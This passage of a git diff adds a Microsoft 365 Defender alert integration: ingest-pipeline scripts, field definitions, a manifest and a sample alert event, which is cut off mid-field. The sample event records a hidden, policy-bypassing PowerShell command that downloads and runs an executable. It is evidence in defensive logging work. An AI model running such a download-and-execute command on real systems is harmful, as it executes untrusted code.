tag: script_to_map_evidence_ecs_fields + lang: painless + if: ctx.json?.evidence instanceof List + source: + def convertToOrderedArray(def list) { + def result = new ArrayList(); + for (element in list) { + result.add(element); + } + Collections.sort(result); + return result; + } + if (!(ctx.cloud instanceof HashMap)) { + ctx.cloud = new HashMap(); + } + def cloudProvider = new HashSet(); + if (!(ctx.group instanceof HashMap)) { + ctx.group = new HashMap(); + } + def groupName = new HashSet(); + if (!(ctx.host instanceof HashMap)) { + ctx.host = new HashMap(); + } + def hostId = new HashSet(); + if (!(ctx.user instanceof HashMap)) { + ctx.user = new HashMap(); + } + def userDomain = new HashSet(); + def userId = new HashSet(); + def userName = new HashSet(); + def userEmail = new HashSet(); + if (!(ctx.process instanceof HashMap)) { + ctx.process = new HashMap(); + } + ctx.process.user = new HashMap(); + def processUserId = new HashSet(); + def processUserName = new HashSet(); + for (evidence in ctx.json.evidence) { + if (evidence?.odata_type == null) { + continue + } + if (evidence?.odata_type == '#microsoft.graph.security.securityGroupEvidence') { + if (evidence?.display_name != null) { + groupName.add(evidence.display_name); + } + } + if (evidence?.odata_type == '#microsoft.graph.security.deviceEvidence') { + if (evidence?.mde_device_id != null) { + hostId.add(evidence.mde_device_id); + } + } + if (['#microsoft.graph.security.mailboxEvidence', '#microsoft.graph.security.userEvidence'].contains(evidence.odata_type)) { + if (evidence?.user_account?.domain_name != null) { + userDomain.add(evidence.user_account.domain_name); + } + if (evidence?.user_account?.azure_ad_user_id != null) { + userId.add(evidence.user_account.azure_ad_user_id); + } + if (evidence?.user_account?.user_principal_name != null) { + userEmail.add(evidence.user_account.user_principal_name); + } + if (evidence?.user_account?.account_name != null) { + userName.add(evidence.user_account.account_name); + } + } + if (evidence?.odata_type == '#microsoft.graph.security.processEvidence') { + if (evidence?.user_account?.azure_ad_user_id != null) { + processUserId.add(evidence.user_account.azure_ad_user_id); + } + if (evidence?.user_account?.account_name != null) { + processUserName.add(evidence.user_account.account_name); + } + } + if (evidence?.vm_metadata?.cloud_provider != null && evidence.vm_metadata.cloud_provider.toLowerCase() == 'azure') { + cloudProvider.add('azure'); + } + } + if (!cloudProvider.isEmpty()) { + ctx.cloud.provider = convertToOrderedArray(cloudProvider); + } + if (!groupName.isEmpty()) { + ctx.group.name = convertToOrderedArray(groupName); + } + if (!hostId.isEmpty()) { + ctx.host.id = convertToOrderedArray(hostId); + } + if (!userDomain.isEmpty()) { + ctx.user.domain = convertToOrderedArray(userDomain); + } + if (!userId.isEmpty()) { + ctx.user.id = convertToOrderedArray(userId); + } + if (!userName.isEmpty()) { + ctx.user.name = convertToOrderedArray(userName); + } + if (!userEmail.isEmpty()) { + ctx.user.email = convertToOrderedArray(userEmail); + } + if (!processUserId.isEmpty()) { + ctx.process.user.id = convertToOrderedArray(processUserId); + } + if (!processUserName.isEmpty()) { + ctx.process.user.name = convertToOrderedArray(processUserName); + } + - script: + description: Set file.size, process.id, process.parent.id fields. + tag: script_to_set_file_process_and_process_parent_fields + lang: painless + if: ctx.json?.evidence instanceof List + source: + def convertToOrderedArray(def list) { + def result = new ArrayList(); + for (element in list) { + result.add(element); + } + Collections.sort(result); + return result; + } + if (!(ctx.file instanceof HashMap)) { + ctx.file = new HashMap(); + } + if (!(ctx.process instanceof HashMap)) { + ctx.process = new HashMap(); + } + if (!(ctx.process.parent instanceof HashMap)) { + ctx.process.parent = new HashMap(); + } + def fileSize = new HashSet(); + def processPid = new HashSet(); + def processParentPid = new HashSet(); + for (evidence in ctx.json.evidence) { + if (evidence?.odata_type == null) { + continue + } + if (evidence?.odata_type == '#microsoft.graph.security.fileEvidence') { + if (evidence?.file_details?.size != null) { + fileSize.add(evidence.file_details.size); + } + } else if (evidence?.odata_type == '#microsoft.graph.security.processEvidence') { + if (evidence?.process?.id != null) { + processPid.add(evidence.process.id); + } + if (evidence?.parent_process?.id != null) { + processParentPid.add(evidence.parent_process.id); + } + } + } + if (!fileSize.isEmpty()) { + ctx.file.size = convertToOrderedArray(fileSize); + } + if (!processPid.isEmpty()) { + ctx.process.pid = convertToOrderedArray(processPid); + } + if (!processParentPid.isEmpty()) { + ctx.process.parent.pid = convertToOrderedArray(processParentPid); + } + - foreach: + field: json.evidence + tag: foreach_evidence_remove_fields + if: ctx.json?.evidence instanceof List + processor: + remove: + field: + - _ingest._value.createdDateTime + - _ingest._value.receivedDateTime + - _ingest._value.attachmentsCount + - _ingest._value.firstSeenDateTime + - _ingest._value.parentProcessCreationDateTime + - _ingest._value.processCreationDateTime + - _ingest._value.senderIp + - _ingest._value.urlCount + - _ingest._value.instanceId + - _ingest._value.appId + - _ingest._value.saasAppId + - _ingest._value.osBuild + - _ingest._value.rbacGroupId + - _ingest._value.fileDetails.fileSize + - _ingest._value.ipAddress + - _ingest._value.emailCount + - _ingest._value.parentProcessId + - _ingest._value.processId + - _ingest._value.imageFile.fileSize + - _ingest._value.parentProcessImageFile.fileSize + ignore_missing: true + - rename: + field: json.evidence + tag: rename_evidence + target_field: m365_defender.alert.evidence + ignore_missing: true + - remove: + if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields')) + tag: remove_ecs_duplicate_fields + field: + - m365_defender.alert.last_update_datetime + - m365_defender.alert.description + - m365_defender.alert.created_datetime + - m365_defender.alert.last_activity_datetime + - m365_defender.alert.id + - m365_defender.alert.service_source + - m365_defender.alert.first_activity_datetime + - m365_defender.alert.web_url + - m365_defender.alert.assigned_to + - m365_defender.alert.threat_family_name + - m365_defender.alert.category + - m365_defender.alert.mitre_techniques + - m365_defender.alert.tenant_id + ignore_missing: true + - foreach: + field: m365_defender.alert.evidence + tag: remove_foreach_ecs_duplicate_fields + if: ctx.m365_defender?.alert?.evidence instanceof List && (ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields'))) + processor: + remove: + field: + - _ingest._value.ip_address + - _ingest._value.detection_status + - _ingest._value.received_datetime + - _ingest._value.antispam_direction + - _ingest._value.subject + - _ingest._value.recipient_email_address + - _ingest._value.instance_id + - _ingest._value.instance_name + - _ingest._value.vm_metadata.cloud_provider + - _ingest._value.os_platform + - _ingest._value.version + - _ingest._value.file_details.sha1 + - _ingest._value.file_details.sha256 + - _ingest._value.file_details.name + - _ingest._value.file_details.path + - _ingest._value.file_details.size + - _ingest._value.process.command_line + - _ingest._value.image_file.sha1 + - _ingest._value.image_file.sha256 + - _ingest._value.parent_process.image_file.sha1 + - _ingest._value.parent_process.image_file.sha256 + - _ingest._value.parent_process.id + - _ingest._value.parent_process.creation_datetime + - _ingest._value.process.id + - _ingest._value.process.creation_datetime + - _ingest._value.registry_value_type + - _ingest._value.registry_hive + - _ingest._value.registry_key + - _ingest._value.registry_value + - _ingest._value.security_group_id + ignore_missing: true + - remove: + field: json + tag: remove_json + ignore_missing: true + - remove: + field: event.original + tag: remove_event_original + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + source: |- + boolean drop(Object object) { + if (object == null || object == '') { + return true; + } else if (object instanceof Map) { + ((Map) object).values().removeIf(v -> drop(v)); + return (((Map) object).size() == 0); + } else if (object instanceof List) { + ((List) object).removeIf(v -> drop(v)); + return (((List) object).length == 0); + } + return false; + } + drop(ctx); + description: Drops null/empty values recursively. + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + value: pipeline_error diff --git a/packages/m365_defender/data_stream/alert/fields/base-fields.yml b/packages/m365_defender/data_stream/alert/fields/base-fields.yml new file mode 100644 index 00000000000..bbcb02bdd75 --- /dev/null +++ b/packages/m365_defender/data_stream/alert/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.module + type: constant_keyword + description: Event module. + value: m365_defender +- name: event.dataset + type: constant_keyword + description: Event dataset. + value: m365_defender.alert +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/m365_defender/data_stream/alert/fields/beats.yml b/packages/m365_defender/data_stream/alert/fields/beats.yml new file mode 100644 index 00000000000..b3701b581cf --- /dev/null +++ b/packages/m365_defender/data_stream/alert/fields/beats.yml @@ -0,0 +1,9 @@ +- name: input.type + type: keyword + description: Type of filebeat input. +- name: log.offset + type: long + description: Log offset. +- name: tags + type: keyword + description: User defined tags. diff --git a/packages/m365_defender/data_stream/alert/fields/fields.yml b/packages/m365_defender/data_stream/alert/fields/fields.yml new file mode 100644 index 00000000000..071b21fc9c8 --- /dev/null +++ b/packages/m365_defender/data_stream/alert/fields/fields.yml @@ -0,0 +1,506 @@ +- name: m365_defender.alert + type: group + fields: + - name: actor_display_name + type: keyword + description: The adversary or activity group that is associated with this alert. + - name: assigned_to + type: keyword + description: Owner of the alert, or null if no owner is assigned. + - name: category + type: keyword + description: The attack kill-chain category that the alert belongs to. Aligned with the MITRE ATT&CK framework. + - name: classification + type: keyword + description: 'Specifies whether the alert represents a true threat. Possible values are: unknown, falsePositive, truePositive, benignPositive, unknownFutureValue.' + - name: comments + type: flattened + description: Array of comments created by the Security Operations (SecOps) team during the alert management process. + - name: created_datetime + type: date + description: Time when Microsoft 365 Defender created the alert. + - name: description + type: keyword + description: String value describing each alert. + - name: detection_source + type: keyword + description: Detection technology or sensor that identified the notable component or activity. + - name: detector_id + type: keyword + description: The ID of the detector that triggered the alert. + - name: determination + type: keyword + description: 'Specifies the result of the investigation, whether the alert represents a true attack and if so, the nature of the attack. Possible values are: unknown, apt, malware, securityPersonnel, securityTesting, unwantedSoftware, other, multiStagedAttack, compromisedUser, phishing, maliciousUserActivity, clean, insufficientData, confirmedUserActivity, lineOfBusinessApplication, unknownFutureValue.' + - name: evidence + type: group + fields: + - name: antispam_direction + type: keyword + description: 'Direction of the email relative to your network. The possible values are: Inbound, Outbound or Intraorg.' + - name: app_id + type: keyword + description: Unique identifier of the application. + - name: attachments_count + type: long + description: Number of attachments in the email. + - name: azure_ad_device_id + type: keyword + description: A unique identifier assigned to a device by Azure Active Directory (Azure AD) when device is Azure AD-joined. + - name: cluster_by + type: keyword + description: The clustering logic of the emails inside the cluster. + - name: cluster_by_value + type: keyword + description: The value utilized to cluster the similar emails. + - name: created_datetime + type: date + description: The time the evidence was created and added to the alert. + - name: defender_av_status + type: keyword + description: 'State of the Defender AntiMalware engine. The possible values are: notReporting, disabled, notUpdated, updated, unknown, notSupported, unknownFutureValue.' + - name: delivery_action + type: keyword + description: 'Delivery action of the email. The possible values are: Delivered, DeliveredAsSpam, Junked, Blocked, or Replaced.' + - name: delivery_location + type: keyword + description: 'Location where the email was delivered. The possible values are: Inbox, External, JunkFolder, Quarantine, Failed, Dropped, DeletedFolder or Forwarded.' + - name: detailed_roles + type: keyword + description: Detailed roles of the user associated with the event. + - name: detection_status + type: keyword + description: 'The status of the detection.The possible values are: detected, blocked, prevented, unknownFutureValue.' + - name: device_dns_name + type: keyword + description: The fully qualified domain name (FQDN) for the device. + - name: display_name + type: keyword + description: Name of the application. + - name: email_count + type: long + description: Count of emails in the email cluster. + - name: file_details + type: group + fields: + - name: issuer + type: keyword + description: The certificate authority (CA) that issued the certificate. + - name: name + type: keyword + description: The name of the file. + - name: odata_type + type: keyword + - name: path + type: keyword + description: The file path (location) of the file instance. + - name: publisher + type: keyword + description: The publisher of the file. + - name: sha1 + type: keyword + description: The Sha1 cryptographic hash of the file content. + - name: sha256 + type: keyword + description: The Sha256 cryptographic hash of the file content. + - name: signer + type: keyword + description: The signer of the signed file. + - name: size + type: long + description: The size of the file in bytes. + - name: first_seen_datetime + type: date + description: The date and time when the device was first seen. + - name: health_status + type: keyword + description: 'The health state of the device.The possible values are: active, inactive, impairedCommunication, noSensorData, noSensorDataImpairedCommunication, unknown, unknownFutureValue.' + - name: image_file + type: group + fields: + - name: issuer + type: keyword + description: The certificate authority (CA) that issued the certificate. + - name: name + type: keyword + description: The name of the file. + - name: odata_type + type: keyword + - name: path + type: keyword + description: The file path (location) of the file instance. + - name: publisher + type: keyword + description: The publisher of the file. + - name: sha1 + type: keyword + description: The Sha1 cryptographic hash of the file content. + - name: sha256 + type: keyword + description: The Sha256 cryptographic hash of the file content. + - name: signer + type: keyword + description: The signer of the signed file. + - name: size + type: long + description: The size of the file in bytes. + - name: instance_id + type: keyword + description: Identifier of the instance of the Software as a Service (SaaS) application. + - name: instance_name + type: keyword + description: Name of the instance of the SaaS application. + - name: internet_message_id + type: keyword + description: Public-facing identifier for the email that is set by the sending email system. + - name: ip_address + type: ip + description: The value of the IP Address, can be either in V4 address or V6 address format. + - name: ip_interfaces + type: ip + description: IP Interfaces related to the event. + - name: language + type: keyword + description: Detected language of the email content. + - name: logged_on_users + type: group + fields: + - name: account_name + type: keyword + description: User account name of the logged-on user. + - name: domain_name + type: keyword + description: User account domain of the logged-on user. + - name: odata_type + type: keyword + - name: mde_device_id + type: keyword + description: A unique identifier assigned to a device by Microsoft Defender for Endpoint. + - name: network_message_id + type: keyword + description: Unique identifier for the email, generated by Microsoft 365. + - name: network_message_ids + type: keyword + description: Unique identifiers for the emails in the cluster, generated by Microsoft 365. + - name: object_id + type: keyword + description: The unique identifier of the application object in Azure AD. + - name: odata_type + type: keyword + - name: onboarding_status + type: keyword + description: 'The status of the machine onboarding to Microsoft Defender for Endpoint.The possible values are: insufficientInfo, onboarded, canBeOnboarded, unsupported, unknownFutureValue.' + - name: os_build + type: keyword + description: The build version for the operating system the device is running. + - name: os_platform + type: keyword + description: The operating system platform the device is running. + - name: p1_sender + type: group + fields: + - name: display_name + type: keyword + description: The name of the sender. + - name: domain_name + type: keyword + description: Sender domain. + - name: email_address + type: keyword + description: Sender email address. + - name: odata_type + type: keyword + - name: p2_sender + type: group + fields: + - name: display_name + type: keyword + description: The name of the sender. + - name: domain_name + type: keyword + description: Sender domain. + - name: email_address + type: keyword + description: Sender email address. + - name: odata_type + type: keyword + - name: parent_process + type: group + fields: + - name: creation_datetime + type: date + description: Date and time when the parent of the process was created. + - name: id + type: long + description: Process ID (PID) of the parent process that spawned the process. + - name: image_file + type: group + fields: + - name: issuer + type: keyword + description: The certificate authority (CA) that issued the certificate. + - name: name + type: keyword + description: The name of the file. + - name: odata_type + type: keyword + - name: path + type: keyword + description: The file path (location) of the file instance. + - name: publisher + type: keyword + description: The publisher of the file. + - name: sha1 + type: keyword + description: The Sha1 cryptographic hash of the file content. + - name: sha256 + type: keyword + description: The Sha256 cryptographic hash of the file content. + - name: signer + type: keyword + description: The signer of the signed file. + - name: size + type: long + description: The size of the file in bytes. + - name: primary_address + type: keyword + description: The primary email address of the mailbox. + - name: process + type: group + fields: + - name: command_line + type: keyword + description: Command line used to create the new process. + - name: creation_datetime + type: date + description: Date and time the process was created. + - name: id + type: long + description: Process ID (PID) of the newly created process. + - name: publisher + type: keyword + description: The name of the application publisher. + - name: query + type: keyword + description: The query used to identify the email cluster. + - name: rbac_group + type: group + fields: + - name: id + type: keyword + description: The ID of the role-based access control (RBAC) device group. + - name: name + type: keyword + description: The name of the RBAC device group. + - name: received_datetime + type: date + description: Date and time when the email was received. + - name: recipient_email_address + type: keyword + description: Email address of the recipient, or email address of the recipient after distribution list expansion. + - name: registry_hive + type: keyword + description: Registry hive of the key that the recorded action was applied to. + - name: registry_key + type: keyword + description: Registry key that the recorded action was applied to. + - name: registry_value + type: keyword + description: Data of the registry value that the recorded action was applied to. + - name: registry_value_name + type: keyword + description: Name of the registry value that the recorded action was applied to. + - name: registry_value_type + type: keyword + description: Data type, such as binary or string, of the registry value that the recorded action was applied to. + - name: remediation_status + type: keyword + description: 'Status of the remediation action taken. The possible values are: none, remediated, prevented, blocked, notFound, active, pendingApproval, declined, notRemediated, running, unknownFutureValue.' + - name: remediation_status_details + type: keyword + description: Details about the remediation status. + - name: risk_score + type: keyword + description: 'Risk score as evaluated by Microsoft Defender for Endpoint. The possible values are: none, informational, low, medium, high, unknownFutureValue.' + - name: roles + type: keyword + description: The role/s that an evidence entity represents in an alert, e.g., an IP address that is associated with an attacker will have the evidence role "Attacker". + - name: saas_app_id + type: keyword + description: The identifier of the SaaS application. + - name: security_group_id + type: keyword + description: Unique identifier of the security group. + - name: sender_ip + type: ip + description: IP address of the last detected mail server that relayed the message. + - name: subject + type: keyword + description: Subject of the email. + - name: tags + type: keyword + description: Array of custom tags associated with an evidence instance, for example to denote a group of devices, high value assets, etc. + - name: threat_detection_methods + type: keyword + description: Collection of methods used to detect malware, phishing, or other threats found in the email. + - name: threats + type: keyword + description: Collection of detection names for malware or other threats found. + - name: type + type: keyword + - name: url + type: keyword + description: The Unique Resource Locator (URL). + - name: url_count + type: long + description: Number of embedded URLs in the email. + - name: urls + type: keyword + description: Collection of the URLs contained in this email. + - name: urn + type: keyword + description: Uniform resource name (URN) of the automated investigation where the cluster was identified. + - name: user_account + type: group + fields: + - name: account_name + type: keyword + description: The user account's displayed name. + - name: azure_ad_user_id + type: keyword + description: The user object identifier in Azure AD. + - name: domain_name + type: keyword + description: The name of the Active Directory domain of which the user is a member. + - name: odata_type + type: keyword + - name: user_principal_name + type: keyword + description: The user principal name of the account in Azure AD. + - name: user_sid + type: keyword + description: The local security identifier of the user account. + - name: verdict + type: keyword + description: 'The decision reached by automated investigation. The possible values are: unknown, suspicious, malicious, noThreatsFound, unknownFutureValue.' + - name: version + type: keyword + description: The version of the operating system platform. + - name: vm_metadata + type: group + fields: + - name: cloud_provider + type: keyword + description: 'The cloud provider hosting the virtual machine. The possible values are: unknown, azure, unknownFutureValue.' + - name: odata_type + type: keyword + - name: resource_id + type: keyword + description: Unique identifier of the Azure resource. + - name: subscription_id + type: keyword + description: Unique identifier of the Azure subscription the customer tenant belongs to. + - name: vm_id + type: keyword + description: Unique identifier of the virtual machine instance. + - name: first_activity_datetime + type: date + description: The earliest activity associated with the alert. + - name: id + type: keyword + description: Unique identifier to represent the alert resource. + - name: incident_id + type: keyword + description: Unique identifier to represent the incident this alert resource is associated with. + - name: incident_web_url + type: group + description: URL for the incident page in the Microsoft 365 Defender portal. + fields: + - name: domain + type: keyword + - name: extension + type: keyword + - name: fragment + type: keyword + - name: full + type: keyword + - name: original + type: keyword + - name: password + type: keyword + - name: path + type: keyword + - name: port + type: long + - name: query + type: keyword + - name: scheme + type: keyword + - name: username + type: keyword + - name: last_activity_datetime + type: date + description: The oldest activity associated with the alert. + - name: last_update_datetime + type: date + description: Time when the alert was last updated at Microsoft 365 Defender. + - name: mitre_techniques + type: keyword + description: The attack techniques, as aligned with the MITRE ATT&CK framework. + - name: odata_type + type: keyword + - name: provider_alert_id + type: keyword + description: The ID of the alert as it appears in the security provider product that generated the alert. + - name: recommended_actions + type: keyword + description: Recommended response and remediation actions to take in the event this alert was generated. + - name: resolved_datetime + type: date + description: Time when the alert was resolved. + - name: service_source + type: keyword + description: 'The service or product that created this alert. Possible values are: microsoftDefenderForEndpoint, microsoftDefenderForIdentity, microsoftCloudAppSecurity, microsoftDefenderForOffice365, microsoft365Defender, aadIdentityProtection, appGovernance, dataLossPrevention.' + - name: severity + type: keyword + description: 'Indicates the possible impact on assets. The higher the severity the bigger the impact. Typically higher severity items require the most immediate attention. Possible values are: unknown, informational, low, medium, high, unknownFutureValue.' + - name: status + type: keyword + description: 'The status of the alert. Possible values are: new, inProgress, resolved, unknownFutureValue.' + - name: tenant_id + type: keyword + description: The Azure Active Directory tenant the alert was created in. + - name: threat_display_name + type: keyword + description: The threat associated with this alert. + - name: threat_family_name + type: keyword + description: Threat family associated with this alert. + - name: title + type: keyword + description: Brief identifying string value describing the alert. + - name: web_url + type: group + description: URL for the alert page in the Microsoft 365 Defender portal. + fields: + - name: domain + type: keyword + - name: extension + type: keyword + - name: fragment + type: keyword + - name: full + type: keyword + - name: original + type: keyword + - name: password + type: keyword + - name: path + type: keyword + - name: port + type: long + - name: query + type: keyword + - name: scheme + type: keyword + - name: username + type: keyword diff --git a/packages/m365_defender/data_stream/alert/manifest.yml b/packages/m365_defender/data_stream/alert/manifest.yml new file mode 100644 index 00000000000..98d02f16c24 --- /dev/null +++ b/packages/m365_defender/data_stream/alert/manifest.yml @@ -0,0 +1,81 @@ +title: Collect Alert logs from Microsoft 365 Defender +type: logs +streams: + - input: httpjson + title: M365D Alerts + description: Collect Alerts from M365 Defender. + template_path: httpjson.yml.hbs + vars: + - name: request_url + type: text + title: Request URL + description: URL of API endpoint. + default: https://graph.microsoft.com + multi: false + required: true + show_user: false + - name: initial_interval + type: text + title: Initial Interval + description: How far back to pull the alerts from Microsoft 365 Defender. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 24h + - name: interval + type: text + title: Interval + description: Duration between requests to the Microsoft Security Graph API V2. Supported units for this parameter are h/m/s. + default: 5m + multi: false + required: true + show_user: true + - name: batch_size + type: integer + title: Batch Size + description: Batch size for the response of the Alert Security Graph API V2. The maximum supported batch size value is 2000. + default: 2000 + multi: false + required: true + show_user: false + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: true + show_user: false + default: 30s + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - m365_defender-alert + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve m365_defender.alert fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. diff --git a/packages/m365_defender/data_stream/alert/sample_event.json b/packages/m365_defender/data_stream/alert/sample_event.json new file mode 100644 index 00000000000..0304a2aaec6 --- /dev/null +++ b/packages/m365_defender/data_stream/alert/sample_event.json @@ -0,0 +1,291 @@ +{ + "@timestamp": "2023-10-20T09:54:07.503Z", + "agent": { + "ephemeral_id": "3e24a8f6-11a3-415f-b6d6-c5188d9239f6", + "id": "26c7b361-0790-47aa-b465-a57c5d8ab6b8", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.7.1" + }, + "cloud": { + "account": { + "id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39" + } + }, + "data_stream": { + "dataset": "m365_defender.alert", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "26c7b361-0790-47aa-b465-a57c5d8ab6b8", + "snapshot": false, + "version": "8.7.1" + }, + "event": { + "action": [ + "detected" + ], + "agent_id_status": "verified", + "category": [ + "host", + "iam", + "network", + "process" + ], + "created": "2023-10-20T09:53:09.883Z", + "dataset": "m365_defender.alert", + "duration": 2478000000, + "end": "2023-10-20T09:51:41.993Z", + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "ingested": "2024-01-29T06:22:16Z", + "kind": "alert", + "original": "{\"actorDisplayName\":null,\"additionalData\":null,\"alertPolicyId\":null,\"alertWebUrl\":\"https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"assignedTo\":null,\"category\":\"Execution\",\"classification\":null,\"comments\":[],\"createdDateTime\":\"2023-10-20T09:53:09.8839373Z\",\"description\":\"A suspicious PowerShell activity was observed on the machine. \\nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.\",\"detectionSource\":\"microsoftDefenderForEndpoint\",\"detectorId\":\"7f1c3609-a3ff-40e2-995b-c01770161d68\",\"determination\":null,\"evidence\":[{\"@odata.type\":\"#microsoft.graph.security.deviceEvidence\",\"azureAdDeviceId\":\"f18bd540-d5e4-46e0-8ddd-3d03a59e4e14\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"defenderAvStatus\":\"notSupported\",\"detailedRoles\":[\"PrimaryDevice\"],\"deviceDnsName\":\"clw555test\",\"firstSeenDateTime\":\"2023-10-20T09:50:17.7383987Z\",\"healthStatus\":\"inactive\",\"ipInterfaces\":[\"192.168.5.65\",\"fe80::cfe4:80b:615c:38fb\",\"127.0.0.1\",\"::1\"],\"loggedOnUsers\":[{\"accountName\":\"CDPUserIS-38411\",\"domainName\":\"AzureAD\"}],\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"onboardingStatus\":\"onboarded\",\"osBuild\":22621,\"osPlatform\":\"Windows11\",\"rbacGroupId\":0,\"rbacGroupName\":null,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"riskScore\":\"high\",\"roles\":[],\"tags\":[],\"verdict\":\"unknown\",\"version\":\"22H2\",\"vmMetadata\":null},{\"@odata.type\":\"#microsoft.graph.security.userEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"azureAdUserId\":null,\"displayName\":null,\"domainName\":\"AzureAD\",\"userPrincipalName\":null,\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\"},\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.urlEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"url\":\"http://127.0.0.1/1.exe\",\"verdict\":\"suspicious\"},{\"@odata.type\":\"#microsoft.graph.security.ipEvidence\",\"countryLetterCode\":null,\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"ipAddress\":\"127.0.0.1\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"suspicious\"},{\"@odata.type\":\"#microsoft.graph.security.processEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"detectionStatus\":\"detected\",\"imageFile\":{\"fileName\":\"powershell.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":491520,\"issuer\":null,\"sha1\":\"a72c41316307889e43fe8605a0dca4a72e72a011\",\"sha256\":\"d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80\",\"signer\":null},\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"parentProcessCreationDateTime\":\"2023-10-20T09:51:19.5064237Z\",\"parentProcessId\":5772,\"parentProcessImageFile\":{\"fileName\":\"cmd.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":323584,\"issuer\":null,\"sha1\":null,\"sha256\":null,\"signer\":null},\"processCommandLine\":\"powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\\\\\test-WDATP-test\\\\\\\\invoice.exe');Start-Process 'C:\\\\\\\\test-WDATP-test\\\\\\\\invoice.exe'\",\"processCreationDateTime\":\"2023-10-20T09:51:39.4997961Z\",\"processId\":8224,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"azureAdUserId\":null,\"displayName\":null,\"domainName\":\"AzureAD\",\"userPrincipalName\":null,\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\"},\"verdict\":\"unknown\"}],\"firstActivityDateTime\":\"2023-10-20T09:51:39.5154802Z\",\"id\":\"daefa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"incidentId\":\"23\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"lastActivityDateTime\":\"2023-10-20T09:51:41.9939003Z\",\"lastUpdateDateTime\":\"2023-10-20T09:54:07.5033333Z\",\"mitreTechniques\":[\"T1059.001\"],\"productName\":\"Microsoft Defender for Endpoint\",\"providerAlertId\":\"efa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"recommendedActions\":\"1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\\n2. Search the script for more indicators to investigate - for example IP addresses (potential C\\u0026C servers), target computers etc.\\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\\n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior 